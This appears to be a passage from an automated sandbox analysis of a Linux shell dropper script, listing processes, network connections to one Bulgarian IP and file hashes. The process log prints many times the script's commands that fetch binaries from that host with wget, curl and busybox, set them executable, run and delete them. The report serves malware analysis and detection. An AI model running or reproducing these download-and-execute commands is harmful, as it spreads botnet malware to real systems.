| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |